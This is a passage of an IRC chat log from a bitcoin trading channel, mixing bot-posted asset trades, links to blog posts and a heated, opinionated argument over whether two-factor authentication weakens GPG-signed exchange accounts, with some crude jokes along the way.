totally uyse it". then .... nothing Jul 15 01:31:41 basically people love to talk. sometimes i listen, to my detriment. Jul 15 01:31:57 the rapid rise of bitcoin this year probly woulda killed them too Jul 15 01:32:08 myeah. Jul 15 01:32:15 welll... on one side. Jul 15 01:32:19 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 15 01:32:26 lol http://trilema.com/2012/amir-taaki-has-done-and-continues-to-do-huge-disservice-to-anyone-serious-involved-in-bitcoin/ Jul 15 01:32:33 uh, uh, uh, Jul 15 01:32:34 On OTC. I challenge the public to a match of an online game. With prize for first person beating me. Jul 15 01:32:48 It's all free, but no challengers. Jul 15 01:33:06 maybe they think you are a kiddie stalker Jul 15 01:34:21 "(Answers phone.) Jul 15 01:34:21 Yeah, hello? No no I’m doing, I’m in a conference. Alright okay goodbye. Jul 15 01:34:21 (To audience.) Jul 15 01:34:21 Sorry that was a friend." Jul 15 01:34:47 [MPEX] [S.MPOE] 13200 @ 0.0008144 = 10.7501 BTC [-] Jul 15 01:34:52 What? It's just a game where they play as a little virtual kid while I play as a virtual rapist. It's safe for kids from 7 to 77 years! Jul 15 01:35:18 But seriously, http://weewar.com Jul 15 01:36:47 It's just moving and producing little war units. Kind of retro. Jul 15 01:38:36 maybe challenge them in WoW Arena or Street Fighter or something people actually try to master Jul 15 01:38:57 looks like Risk Jul 15 01:39:00 but retarded Jul 15 01:39:18 It's not really like Risk. Jul 15 01:39:31 Which is just countries, units and rolling dices. Jul 15 01:40:01 [BTCTC] [GSDPT] 22 @ 0.002295 = 0.0505 BTC [+] Jul 15 01:40:09 It wouldn't be challenging. I got no WoW character and I suck at Street Fighter. Wouldn't be a challenge. Jul 15 01:40:37 [BTCTC] [DMS.MINING] 10 @ 0.01625 = 0.1625 BTC [+] Jul 15 01:41:52 this is great http://trilema.com/2012/the-bitcoin-drama-timeline/ Jul 15 01:42:11 It's very similar to a popular Gameboy Advance game, but online. Jul 15 01:42:23 well if the guy is paying he can puick the game Jul 15 01:42:42 Indeed, if the guy is paying... pick the game. Jul 15 01:42:42 is ThickAsThieves reading channel logs from teh dawn of time? Jul 15 01:43:05 I don't ask for entry fees or anything, just offer a prize. Jul 15 01:43:13 reading all finance/bitcoin trilema posts and clicking on everything interesting Jul 15 01:43:20 you'll be there a while. Jul 15 01:43:34 I'll 1v1 cs_italy pistols only for a butcoin kekeke Jul 15 01:43:39 yes, the world ended in 2012 Jul 15 01:43:44 been here since breakfast, still have a lot to g Jul 15 01:43:45 o Jul 15 01:44:07 this is what random btctalk noob with apri account usually fails to grasp Jul 15 01:44:26 merely reading the uber-summarised trilema chronicles would take him more work than he likely put towards his college degree. Jul 15 01:45:42 [BTCTC] [AMC-PT] 15 @ 0.0025 = 0.0375 BTC [+] Jul 15 01:46:29 lmao Jul 15 01:47:00 you know i had a programme, years ago, where i'd pay a grant towards someone's grad/master studies if they did it on trilema ? Jul 15 01:47:10 incidentally that;s sorta what started me reading Jul 15 01:47:39 I am doing research in order to work on a paper of sorts Jul 15 01:47:43 ha Jul 15 01:48:12 if they 'did it' on trilema eh Jul 15 01:48:31 i will do it on trilema for btc Jul 15 01:48:35 nekkid Jul 15 01:48:36 lol. i have that too. Jul 15 01:48:40 somewhere. Jul 15 01:48:51 there was some porn king years ago paying college tuition for well, porn Jul 15 01:48:53 and then there's the bunny Jul 15 01:49:06 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00444 = 0.0089 BTC [-] Jul 15 01:49:35 the post about how a small majority of irresponsible parties can affect everyone was good too Jul 15 01:50:32 small majority? Jul 15 01:50:32 just another way to lean towards the "weak hands" comcept Jul 15 01:50:52 mircea's words Jul 15 01:50:53 , Jul 15 01:50:56 i take it to mean, Jul 15 01:51:04 a subgroup's majority Jul 15 01:51:16 [BTCTC] [BTC-BOND] 1 @ 0.009955 BTC [-] Jul 15 01:51:42 [BTCTC] [AMC-PT] 32 @ 0.0025 = 0.08 BTC [+] Jul 15 01:52:16 hm, i didn't read that post either Jul 15 01:52:25 it's a meme Jul 15 01:52:40 some idiot said that a small majority of w/e got stolen Jul 15 01:52:48 mebbe it was shtylman Jul 15 01:53:21 jurov http://trilema.com/2012/fact-of-the-matter-is-the-infrastructure-was-not-ready/ Jul 15 01:53:32 yes i found it Jul 15 01:55:07 anyway, buttcoiner pr is laughably stupid. some guy was trying to make whatever breach appear small Jul 15 01:55:13 a nonsensical approach in the first place Jul 15 01:55:22 a similar phrase some people say: "probably definitely" Jul 15 01:55:27 so majority got qualified by "small" Jul 15 01:55:32 because epithets are the solution Jul 15 01:55:33 yeah Jul 15 01:55:55 sorta cheating and white lieing. Jul 15 01:56:12 yep Jul 15 01:56:12 somewhat dead in a small majority of possible universes. Jul 15 01:56:22 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 15 01:56:33 [BTCTC] [AMC-PT] 1000 @ 0.002476 = 2.476 BTC [-] Jul 15 01:56:34 salesman talk Jul 15 01:56:45 scammertalk Jul 15 01:56:51 BITCOINTALK! Jul 15 01:57:42 hehehe Jul 15 01:57:56 [BTCTC] [AMC-PT] 150 @ 0.002476 = 0.3714 BTC [-] Jul 15 01:57:58 [BTCTC] [AMC-PT] 100 @ 0.002475 = 0.2475 BTC [-] Jul 15 01:57:59 [BTCTC] [AMC-PT] 25 @ 0.002471 = 0.0618 BTC [-] Jul 15 01:58:01 [BTCTC] [AMC-PT] 196 @ 0.00247 = 0.4841 BTC [-] Jul 15 01:58:02 [BTCTC] [AMC-PT] 329 @ 0.00247 = 0.8126 BTC [-] Jul 15 01:58:12 trolltalk! Jul 15 01:58:33 Burnside's new security feature: https://bitcointalk.org/index.php?topic=125629.msg2726336#msg2726336 Jul 15 01:58:44 "Big change tonight to the reset process for PINS, WITHDRAWAL ACCOUNT LOCKS, GOOGLE AUTH, and YUBIKEYS." Jul 15 01:58:58 "It will send you an email. Jul 15 01:58:58 You confirm the request by clicking the link in the email. Jul 15 01:58:58 The request then sits in our queue for 30 days. Jul 15 01:58:58 During the 30 days the request detail and status appears at the top of the portfolio page, including a cancel button to cancel the request. Jul 15 01:58:58 After 30 days we process the request. Jul 15 01:58:58 We apologize for the long wait period on doing these resets, but it is important to give an owner of a compromised email account plenty of time to realize they are compromised and recover their account before we hand over their entire account contents. Jul 15 01:58:59 Automating this process has the side benefit that we'll be able to make resets free of charge going forward. (each reset used to be 0.5 BTC)" Jul 15 02:00:00 [HAVELOCK] [AM1] 2 @ 4.23 = 8.46 BTC [-] Jul 15 02:00:11 [HAVELOCK] [AM1] 1 @ 4.17 BTC [-] Jul 15 02:00:23 [HAVELOCK] [AM1] 9 @ 4.16100001 = 37.449 BTC [-] Jul 15 02:01:27 Which reminds me... is it possible to get your MPEx key changed? Jul 15 02:01:33 [BTCTC] [DMS.MINING] 1 @ 0.0158 BTC [-] Jul 15 02:01:46 [BTCTC] [TAT.ASICMINER] 25 @ 0.04172 = 1.043 BTC [-] Jul 15 02:01:51 [BTCTC] [TAT.ASICMINER] 50 @ 0.041719 = 2.086 BTC [-] Jul 15 02:01:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.0417 BTC [-] Jul 15 02:02:00 nope Jul 15 02:02:15 How annoying. Jul 15 02:03:38 and no 2FA of any kind. Jul 15 02:05:14 It would certainly help against gpg key theft. Jul 15 02:05:34 I was thinking about going offline key only. Jul 15 02:05:54 But still, gpg key theft remains a possibility. Jul 15 02:05:57 how ? Jul 15 02:06:30 2fa ? wtf are you on about. Jul 15 02:07:07 Requires access to an external device, not just the appropriate password/gpg signature/etc Jul 15 02:07:11 ... Jul 15 02:07:18 security is not about wearing amulets you know. Jul 15 02:08:53 nipple rings. Jul 15 02:08:55 2ta Jul 15 02:09:01 the new secret decoder ring Jul 15 02:09:15 2 factor auth is actually quite effective. Jul 15 02:09:23 Albeit just an extra layer. Jul 15 02:09:50 Namworld it's neither effective nor is the website model actually secure-able. Jul 15 02:09:57 it would actually lower gpg security. Jul 15 02:10:27 How would that affect gpg security in any way? Jul 15 02:10:30 side channel. Jul 15 02:11:45 i'd rather suggest to have two pgp keys. one for trading only and other that would allow to PUSH and WITHDRAW Jul 15 02:12:09 [MPEX] [S.MPOE] 5050 @ 0.00081534 = 4.1175 BTC [+] Jul 15 02:12:18 [BTCTC] [BASIC-MINING] 1 @ 0.664999 BTC [-] Jul 15 02:12:57 in any case you don't need fancy hardware to protect mpex acct. just airgapped machine, and you can pepare commands in advance and just scan them in as needed Jul 15 02:12:58 I'm not... I don't quite see how that would offer a side channel attack. Jul 15 02:13:08 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 15 02:13:58 [HAVELOCK] [AM1] 1 @ 4.349 BTC [+] Jul 15 02:14:44 you don't see how adding a side channel would add a side channel ? Jul 15 02:14:48 why is this ? Jul 15 02:16:29 Because it's not a side channel? Jul 15 02:16:40 anything is a side channel. Jul 15 02:16:51 that's why you don't go around slapping random things upon a security scheme Jul 15 02:17:05 [HAVELOCK] [AM100] 1 @ 0.040899 BTC [+] Jul 15 02:19:12 It's a random number that would be included within the gpg encrypted message. It doesn't provide an attack vector. Jul 15 02:20:30 Well it would introduce further complexity on the server-side handling, which could introduce vulnerabilities. But that's not really a side channel. Jul 15 02:20:47 [BTCTC] [BASIC-MINING] 9 @ 0.662001 = 5.958 BTC [-] Jul 15 02:20:49 [BTCTC] [BASIC-MINING] 10 @ 0.662 = 6.62 BTC [-] Jul 15 02:21:26 [BTCTC] [B.YABMC] 4 @ 0.0025 = 0.01 BTC [+] Jul 15 02:22:36 if you use your phone for it you're using your phone for it. Jul 15 02:22:54 if you don't use your phone for it you're just doing nonsense to already encrypted stuff. value = 0. Jul 15 02:24:04 [BTCTC] [COGNITIVE] 1 @ 0.581996 BTC [+] Jul 15 02:24:06 [BTCTC] [COGNITIVE] 4 @ 0.581997 = 2.328 BTC [+] Jul 15 02:24:16 It uses the phone, plus a computer. The phone only provide you a random number based on an extra secret key. Jul 15 02:24:26 irrelevant. the phone is a side channel. Jul 15 02:25:15 The phone doesn't allow you to do any input or decrypt/sign gpg. Jul 15 02:25:47 It does not offer any attack vector on the gpg signature required nor bypass the need for it. Jul 15 02:26:56 Such that if one device is compromised, the account isn't, as it requires to authing method. One alone is not sufficient, such that it requires access to 2 devices to effectively gain access to an account. Jul 15 02:27:15 mp, is this still your core argument against the SEC, or would you say the developments have evolved? http://trilema.com/2012/the-reasons-why-bitcoin-securities-cant-be-regulated-by-the-sec/ Jul 15 02:27:36 i don't think you're ready for this convo yet Namworld. take my word for it or don't, what can i say. Jul 15 02:28:02 ThickAsThieves how would things evolve ? Jul 15 02:28:31 either on your end through your counsel's work, or in legal precedents since Jul 15 02:28:52 definitely not my area Jul 15 02:29:28 I'm not sure where you get the idea the 2FA device offers an attack vector. Especially a side channel attack. Jul 15 02:29:37 yeah but i mean... bitcoin is still not issued by anyone. nobody has any title to any bitcoin still. nothing has changed, nothing can reasonably change. Jul 15 02:31:04 [BTCTC] [DMS.SELLING] 125 @ 0.02569 = 3.2113 BTC [-] Jul 15 02:31:37 all posturing to the contrary aside, that's pretty much set in stone. Jul 15 02:31:55 thx Jul 15 02:32:11 [BTCTC] [BASIC-MINING] 1 @ 0.655 BTC [-] Jul 15 02:32:52 or perhaps you're thinking of something else than side channel... Jul 15 02:33:36 [BTCTC] [AMC-PT] 20000 @ 0.0025 = 50 BTC [+] Jul 15 02:34:51 so THIS is why you are making S.MG! Jul 15 02:34:58 mwoo hahahaha Jul 15 02:35:22 everything i do is for a bunch of various reasons. Jul 15 02:35:25 that's what strategy is Jul 15 02:36:17 [BTCTC] [BASIC-MINING] 1 @ 0.664999 BTC [+] Jul 15 02:36:55 [HAVELOCK] [AM100] 1 @ 0.0404 BTC [-] Jul 15 02:36:56 [HAVELOCK] [AM100] 44 @ 0.0403 = 1.7732 BTC [-] Jul 15 02:37:04 [BTCTC] [GSDPT] 45 @ 0.002295 = 0.1033 BTC [+] Jul 15 02:37:06 [BTCTC] [GSDPT] 100 @ 0.002295 = 0.2295 BTC [+] Jul 15 02:37:28 I'm definitly certain side channel is not the term you meant. Jul 15 02:38:09 im definitely certain you're clueless. there are three types of attacks against encryption. brute force, analysis and side channel. Jul 15 02:38:20 [BTCTC] [TAT.ASICMINER] 81 @ 0.042001 = 3.4021 BTC [+] Jul 15 02:38:21 [BTCTC] [TAT.ASICMINER] 162 @ 0.042 = 6.804 BTC [-] Jul 15 02:38:28 [HAVELOCK] [SDICE] 15 @ 0.204 = 3.06 BTC [-] Jul 15 02:38:34 security is a professional field. it is not opened to guesswork and opining. moreso than surgery Jul 15 02:38:38 people die. Jul 15 02:38:44 [HAVELOCK] [HIM] 1 @ 0.281 BTC [+] Jul 15 02:39:05 [HAVELOCK] [SDSTM] 9 @ 0.009295 = 0.0837 BTC [-] Jul 15 02:39:20 [HAVELOCK] [AM100] 1 @ 0.0408 BTC [+] Jul 15 02:39:22 [HAVELOCK] [AM100] 10 @ 0.04080088 = 0.408 BTC [+] Jul 15 02:39:23 [HAVELOCK] [AM100] 10 @ 0.0409 = 0.409 BTC [+] Jul 15 02:39:24 [HAVELOCK] [AM100] 1 @ 0.04098 BTC [+] Jul 15 02:39:25 [HAVELOCK] [AM100] 100 @ 0.040998 = 4.0998 BTC [+] Jul 15 02:39:27 [HAVELOCK] [AM100] 52 @ 0.041 = 2.132 BTC [+] Jul 15 02:40:28 [BTCTC] [GSDPT] 25 @ 0.002296 = 0.0574 BTC [+] Jul 15 02:42:03 [HAVELOCK] [AM100] 2 @ 0.04109888 = 0.0822 BTC [+] Jul 15 02:42:33 and I'm pretty positive on that matter.... Jul 15 02:44:26 [HAVELOCK] [AM100] 184 @ 0.040502 = 7.4524 BTC [-] Jul 15 02:44:43 [HAVELOCK] [AM1] 2 @ 4.349 = 8.698 BTC [+] Jul 15 02:48:35 [BTCTC] [ASICMINER-PT] 1 @ 4.249999 BTC [-] Jul 15 02:49:35 [BTCTC] [ASICMINER-PT] 2 @ 4.25 = 8.5 BTC [+] Jul 15 02:49:46 2FA would not yield any extra data about the gpg encryption process that would allow for a side channel attack. It is a completly external process which provide no insight/data as to what is occuring during the encryption, which would allow you to make any kind of deduction needed... It would just baffles me too much. I'm quite curious as to how that would be even remotely possible. Jul 15 02:50:43 [HAVELOCK] [AM1] 7 @ 4.349 = 30.443 BTC [+] Jul 15 02:51:03 you're making the newbish mistake on focusing of a part of the entire thing. suppose it gives away your position. Jul 15 02:51:07 [BTCTC] [ASICMINER-PT] 7 @ 4.25 = 29.75 BTC [+] Jul 15 02:52:04 Yes? Jul 15 02:52:36 can it be summed up as, a machine with more parts, has more parts that can break Jul 15 02:54:53 another good one http://trilema.com/2012/the-politics-of-bitcoin/ Jul 15 02:55:02 Well that's not what it is about for the side channel attack. That's true for the server side handling where extra complexity can introduce bugs. Jul 15 02:57:00 I'm just curious as to how using a device to get a 2 FA code allows for the analyzis of the encryption process that occurs on another machine. That's not really a physical possibility. Jul 15 02:57:02 [HAVELOCK] [AM100] 153 @ 0.040502 = 6.1968 BTC [-] Jul 15 02:57:30 [HAVELOCK] [AM100] 67 @ 0.040502 = 2.7136 BTC [-] Jul 15 02:58:06 I think the problem is that the 2FA validator needs an internet connection Jul 15 02:58:13 and it's only valid in intervals of 1 minute Jul 15 02:58:25 [HAVELOCK] [AM100] 151 @ 0.040502 = 6.1158 BTC [-] Jul 15 02:58:35 plus it relies on a 3rd party (ie. google) Jul 15 02:58:56 It doesn't need an internet connection. It's time based. The device can be completly offline. Jul 15 02:59:31 last i checked you couldnt query the google 2fa with a timestamp in the past Jul 15 02:59:33 [HAVELOCK] [AM100] 240 @ 0.040502 = 9.7205 BTC [-] Jul 15 03:00:33 If your device is at the correct time, it will generate the correct code that is currently valid. Jul 15 03:00:44 It doesn't require to be connected at all. Jul 15 03:00:53 [BTCTC] [BASIC-MINING] 1 @ 0.664999 BTC [+] Jul 15 03:00:56 [HAVELOCK] [VTX] 1 @ 0.6 BTC [-] Jul 15 03:00:57 not to derail yet another famous Namworld debate but I think the point is that if your pgp keys have bolted it is probably too late to shut the gate Jul 15 03:00:59 that would require a custom device Jul 15 03:01:27 No, any phone can do that inherently... Jul 15 03:01:48 If it supports any 2FA app, it will work even when offline. Jul 15 03:02:12 if i have your keys I can probably have your phone too Jul 15 03:02:49 Namworld: ah, RFC6238 Jul 15 03:02:54 in that case you're right Jul 15 03:03:14 dub, not necessarily, but yes. It's just an extra layer. Jul 15 03:03:29 this convo is hilarious Jul 15 03:03:43 anyway. when i retire maybe i'll run a security university. Jul 15 03:03:43 your face is hilarious Jul 15 03:03:52 it will however include beatings for recalcitrant students. Jul 15 03:03:55 and high fees. Jul 15 03:04:07 [HAVELOCK] [AM100] 116 @ 0.040502 = 4.6982 BTC [-] Jul 15 03:04:45 [BTCTC] [TAT.ASICMINER] 116 @ 0.04161 = 4.8268 BTC [-] Jul 15 03:04:45 and I find it funny you believe 2FA allows for a side channel attack. Jul 15 03:05:01 !mp http://dpaste.com/1301177/ Jul 15 03:05:02 Processing. Jul 15 03:05:07 Response: http://dpaste.com/1301178/plain/ Jul 15 03:05:30 mircea_popescu: security is a scam Jul 15 03:05:40 you dirty scammer Jul 15 03:05:49 too tired to debate Jul 15 03:05:52 gn Jul 15 03:06:01 [BTCTC] [AMC-PT] 1545 @ 0.0025 = 3.8625 BTC [+] Jul 15 03:06:23 mircea_popescu, can you look at that response please? Jul 15 03:06:35 heh borkt. 1 sec. Jul 15 03:07:19 mpex.co is not resolving correctly for me either. Jul 15 03:07:55 [MPEX] [S.MPOE] 5227 @ 0.0008144 = 4.2569 BTC [-] Jul 15 03:08:01 [BTCTC] [DMS.PURCHASE] 35 @ 0.040172 = 1.406 BTC [-] Jul 15 03:08:06 !mp http://dpaste.com/1301177/ Jul 15 03:08:07 Processing. Jul 15 03:08:10 Response: http://dpaste.com/1301189/plain/ Jul 15 03:08:18 better ? Jul 15 03:08:53 much - thanks! Jul 15 03:09:04 Just a question... are you implying that the 2FA device might give out your location, thus location of the other machine with the gpg key, thus possible access to conduct a side channel attack? That's kind of far fetched. Jul 15 03:09:12 np Jul 15 03:09:19 [HAVELOCK] [AM100] 70 @ 0.040503 = 2.8352 BTC [+] Jul 15 03:09:21 [HAVELOCK] [AM100] 10 @ 0.04050211 = 0.405 BTC [-] Jul 15 03:09:34 Namworld it's not far fetched at all. security is security, not some random facet of it you happened to latch onto. Jul 15 03:10:04 as it stands right now you can make your order and leave it in a dead drop or w/e Jul 15 03:10:55 Because the 2FA device does not need to be online at all, thus not give out the location of the gpg device at all. Thus it wouldn't really help at all to perform a side channel attack. Jul 15 03:11:20 thanks mircea_popescu - yes I can dead drop just fine. the comment about mpex.co was a heads up in case it helped troubleshoot. We're good. Jul 15 03:11:38 fancy_pants was talkin' to him but kk :) Jul 15 03:11:55 Plus with physical access to the device, they might as well just take the keys on it, they don't need to perform the side channel attack at all. Jul 15 03:13:11 02:58 plus it relies on a 3rd party (ie. google) <-- i think the name "Google Authenticator" has somehow bred the misconception that 2FA required a third party Jul 15 03:13:52 [MPEX] [S.MPOE] 9033 @ 0.00081001 = 7.3168 BTC [-] Jul 15 03:14:59 2fa is the equivalent of the "antivirus" Jul 15 03:15:07 it's a half baked solution to a structural problem Jul 15 03:15:26 there's no antivirus for linux, both because the antivirus doesn't do anything and because the problem is to be solved elsewhere. Jul 15 03:15:53 [BTCTC] [BASIC-MINING] 1 @ 0.664999 BTC [+] Jul 15 03:17:58 No, 2FA is strictly about adding the need for access to an extra device to do sensitive operations. Jul 15 03:19:04 But just to come back to what jurov said Jul 15 03:19:08 "[19:11] i'd rather suggest to have two pgp keys. one for trading only and other that would allow to PUSH and WITHDRAW" Jul 15 03:19:26 That's probably more elegant and efficient. Jul 15 03:19:42 there is at least one more important feature of 2fa and in your case it has succeded admirably Jul 15 03:19:57 [HAVELOCK] [AM100] 10 @ 0.040502 = 0.405 BTC [-] Jul 15 03:20:26 [BTCTC] [ASICMINER-PT] 3 @ 4.25 = 12.75 BTC [+] Jul 15 03:20:56 [BTCTC] [BASIC-MINING] 2 @ 0.665 = 1.33 BTC [+] Jul 15 03:22:51 [BTCTC] [AMC-PT] 125 @ 0.0025 = 0.3125 BTC [+] Jul 15 03:23:28 [HAVELOCK] [AM100] 460 @ 0.040502 = 18.6309 BTC [-] Jul 15 03:24:46 [HAVELOCK] [AM100] 123 @ 0.0405 = 4.9815 BTC [-] Jul 15 03:26:19 Not sure where you're going on with this, but I get the general idea. Jul 15 03:26:44 [BTCTC] [S.MPOE-PT] 1 @ 0.000925 BTC [+] Jul 15 03:26:45 (@dub) Jul 15 03:26:59 [BTCTC] [TAT.VIRTUALMINE] 45 @ 0.004211 = 0.1895 BTC [-] Jul 15 03:28:09 [BTCTC] [TAT.ASICMINER] 4 @ 0.042314 = 0.1693 BTC [+] Jul 15 03:30:43 [HAVELOCK] [AM100] 1 @ 0.040502 BTC [+] Jul 15 03:35:42 [HAVELOCK] [AM100] 10 @ 0.04109111 = 0.4109 BTC [+] Jul 15 03:41:07 [HAVELOCK] [AM100] 70 @ 0.04109111 = 2.8764 BTC [+] Jul 15 03:44:02 [BTCTC] [S.BBET-PT] 4 @ 0.001503 = 0.006 BTC [+] Jul 15 03:44:03 [HAVELOCK] [AM100] 130 @ 0.04109111 = 5.3418 BTC [+] Jul 15 03:44:10 [BTCTC] [AMC-PT] 48 @ 0.0025 = 0.12 BTC [+] Jul 15 03:44:26 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 15 03:46:04 [BTCTC] [AMC-PT] 25 @ 0.002471 = 0.0618 BTC [-] Jul 15 03:46:47 $avg Jul 15 03:46:48 mircea_popescu: 93.99 Jul 15 03:46:55 $depth S.MG Jul 15 03:46:56 mircea_popescu: S.MG Bids: ['7250 @ 0.00013', '40000 @ 0.00012003', '400 @ 0.00012003', '11000 @ 0.00012002', '5000 @ 0.00012'] Jul 15 03:46:57 mircea_popescu: Asks: ['16726 @ 0.0002475', '20000 @ 0.00025', '30000 @ 0.00027', '100000 @ 0.0004'] Jul 15 03:47:01 [BTCTC] [TAT.ASICMINER] 50 @ 0.041653 = 2.0827 BTC [-] Jul 15 03:47:03 [BTCTC] [TAT.ASICMINER] 75 @ 0.041652 = 3.1239 BTC [-] Jul 15 03:47:04 $vwap Jul 15 03:47:06 mircea_popescu: http://pastebin.com/raw.php?i=Fvej7RGs Jul 15 03:47:48 [BTCTC] [AMC-PT] 521 @ 0.00247 = 1.2869 BTC [-] Jul 15 03:47:50 [BTCTC] [AMC-PT] 100 @ 0.00247 = 0.247 BTC [-] Jul 15 03:47:52 [BTCTC] [AMC-PT] 10 @ 0.002461 = 0.0246 BTC [-] Jul 15 03:47:52 [BTCTC] [AMC-PT] 281 @ 0.00246 = 0.6913 BTC [-] Jul 15 03:52:19 [HAVELOCK] [HIM] 3 @ 0.281 = 0.843 BTC [+] Jul 15 03:52:20 [HAVELOCK] [HIM] 5 @ 0.28222 = 1.4111 BTC [+] Jul 15 03:52:22 [HAVELOCK] [HIM] 2 @ 0.2867 = 0.5734 BTC [+] Jul 15 03:57:12 mircea_popescu: there is a glitch in your site, php related Jul 15 03:58:24 actually it looks like it's domain related Jul 15 04:00:06 [BTCTC] [BASIC-MINING] 5 @ 0.675 = 3.375 BTC [+] Jul 15 04:00:29 [BTCTC] [TAT.ASICMINER] 125 @ 0.041652 = 5.2065 BTC [-] Jul 15 04:00:33 [BTCTC] [TAT.ASICMINER] 20 @ 0.04165 = 0.833 BTC [-] Jul 15 04:00:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.0416 BTC [-] Jul 15 04:00:45 [BTCTC] [TAT.ASICMINER] 30 @ 0.04114 = 1.2342 BTC [-] Jul 15 04:00:47 [BTCTC] [TAT.ASICMINER] 43 @ 0.04114 = 1.769 BTC [-] Jul 15 04:00:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.04113 = 0.4113 BTC [-] Jul 15 04:00:53 [BTCTC] [TAT.ASICMINER] 7 @ 0.041126 = 0.2879 BTC [-] Jul 15 04:00:55 [BTCTC] [TAT.ASICMINER] 53 @ 0.041125 = 2.1796 BTC [-] Jul 15 04:02:37 [BTCTC] [TAT.VIRTUALMINE] 45 @ 0.004399 = 0.198 BTC [+] Jul 15 04:02:38 [BTCTC] [TAT.VIRTUALMINE] 498 @ 0.0044 = 2.1912 BTC [+] Jul 15 04:02:47 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.00443 = 0.2215 BTC [+] Jul 15 04:02:49 [BTCTC] [TAT.VIRTUALMINE] 55 @ 0.00444 = 0.2442 BTC [+] Jul 15 04:02:51 [BTCTC] [TAT.VIRTUALMINE] 155 @ 0.004448 = 0.6894 BTC [+] Jul 15 04:02:53 [BTCTC] [TAT.VIRTUALMINE] 197 @ 0.00445 = 0.8767 BTC [+] Jul 15 04:03:22 something a little less vague ? Jul 15 04:04:58 [BTCTC] [TAT.VIRTUALMINE] 59 @ 0.00445 = 0.2626 BTC [+] Jul 15 04:05:16 [HAVELOCK] [SDSTM] 7 @ 0.0091 = 0.0637 BTC [-] Jul 15 04:05:20 the links here: http://trilema.com/category/smg/ go to polimedia.us still Jul 15 04:05:42 so when I clicked them the paywall arose Jul 15 04:06:02 but when you replace the beginning of the url with trilema.com it works just fine Jul 15 04:06:12 hmm Jul 15 04:06:17 [BTCTC] [DMS.PURCHASE] 90 @ 0.040172 = 3.6155 BTC [-] Jul 15 04:06:25 ah i see. Jul 15 04:06:38 small error no biggie Jul 15 04:06:47 [HAVELOCK] [AM100] 10 @ 0.0406 = 0.406 BTC [-] Jul 15 04:06:48 [HAVELOCK] [AM100] 10 @ 0.0406 = 0.406 BTC [-] Jul 15 04:07:03 try now. Jul 15 04:07:44 [HAVELOCK] [SDSTM] 50 @ 0.009 = 0.45 BTC [-] Jul 15 04:07:45 [HAVELOCK] [SDSTM] 39 @ 0.0091 = 0.3549 BTC [+] Jul 15 04:09:03 good stuff. thanks ;) Jul 15 04:09:52 reward time: http://www.cosmicadventuresquad.com/projects/planetration/ Jul 15 04:12:50 [BTCTC] [TAT.ASICMINER] 3 @ 0.041126 = 0.1234 BTC [+] Jul 15 04:14:50 [BTCTC] [AMC-PT] 80 @ 0.0025 = 0.2 BTC [+] Jul 15 04:18:20 [BTCTC] [ASICMINER-PT] 1 @ 4.235001 BTC [-] Jul 15 04:22:39 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 15 04:24:50 [MPEX] [S.MPOE] 7700 @ 0.00081086 = 6.2436 BTC [+] Jul 15 04:27:53 [HAVELOCK] [AM100] 70 @ 0.0406 = 2.842 BTC [-] Jul 15 04:27:53 [HAVELOCK] [AM100] 30 @ 0.0406 = 1.218 BTC [-] Jul 15 04:29:26 $depth S.MPOE Jul 15 04:29:27 fancy_pants: S.MPOE Bids: ['6519 @ 0.00081086', '2600 @ 0.00080012', '11300 @ 0.00079179', '28830 @ 0.00078804', '5773 @ 0.00077252'] Jul 15 04:29:28 fancy_pants: Asks: ['10800 @ 0.00081408', '7450 @ 0.00081534', '19400 @ 0.00082043', '5000 @ 0.00092045', '11448 @ 0.00092049'] Jul 15 04:31:02 [BTCTC] [DMS.MINING] 5 @ 0.01621 = 0.0811 BTC [+] Jul 15 04:31:07 [BTCTC] [DMS.MINING] 85 @ 0.01621 = 1.3779 BTC [+] Jul 15 04:34:56 [BTCTC] [DMS.MINING] 15 @ 0.01621 = 0.2432 BTC [+] Jul 15 04:34:58 [BTCTC] [DMS.MINING] 820 @ 0.0162 = 13.284 BTC [-] Jul 15 04:37:00 [BTCTC] [AMC-PT] 12 @ 0.0025 = 0.03 BTC [+] Jul 15 04:38:44 [HAVELOCK] [AM100] 3 @ 0.04109799 = 0.1233 BTC [+] Jul 15 04:40:41 [BTCTC] [DMS.PURCHASE] 300 @ 0.040172 = 12.0516 BTC [-] Jul 15 04:44:38 [BTCTC] [AMC-PT] 8 @ 0.0025 = 0.02 BTC [+] Jul 15 04:46:56 [BTCTC] [TAT.ASICMINER] 15 @ 0.042239 = 0.6336 BTC [+] Jul 15 04:47:55 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.00445 = 0.089 BTC [+] Jul 15 04:48:07 [BTCTC] [BASIC-MINING] 14 @ 0.655 = 9.17 BTC [-] Jul 15 04:48:20 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [+] Jul 15 04:49:17 [BTCTC] [TAT.ASICMINER] 30 @ 0.042239 = 1.2672 BTC [+] Jul 15 04:49:19 [BTCTC] [TAT.ASICMINER] 11 @ 0.04224 = 0.4646 BTC [+] Jul 15 04:49:21 [BTCTC] [TAT.ASICMINER] 50 @ 0.042248 = 2.1124 BTC [+] Jul 15 04:49:21 [BTCTC] [TAT.ASICMINER] 9 @ 0.042319 = 0.3809 BTC [+] Jul 15 04:57:40 [HAVELOCK] [VTX] 2 @ 0.799 = 1.598 BTC [+] Jul 15 04:57:41 [BTCTC] [AMC-PT] 950 @ 0.0025 = 2.375 BTC [+] Jul 15 04:57:48 [HAVELOCK] [SDSTM] 220 @ 0.0091 = 2.002 BTC [+] Jul 15 04:57:52 [HAVELOCK] [AM100] 10 @ 0.041097 = 0.411 BTC [-] Jul 15 04:58:54 [BTCTC] [AMC-PT] 13 @ 0.0025 = 0.0325 BTC [+] Jul 15 04:59:08 [HAVELOCK] [VTX] 17 @ 0.7 = 11.9 BTC [-] Jul 15 05:00:28 [BTCTC] [DMS.SELLING] 32 @ 0.02401 = 0.7683 BTC [-] Jul 15 05:00:30 [BTCTC] [DMS.SELLING] 9 @ 0.024008 = 0.2161 BTC [-] Jul 15 05:00:32 [BTCTC] 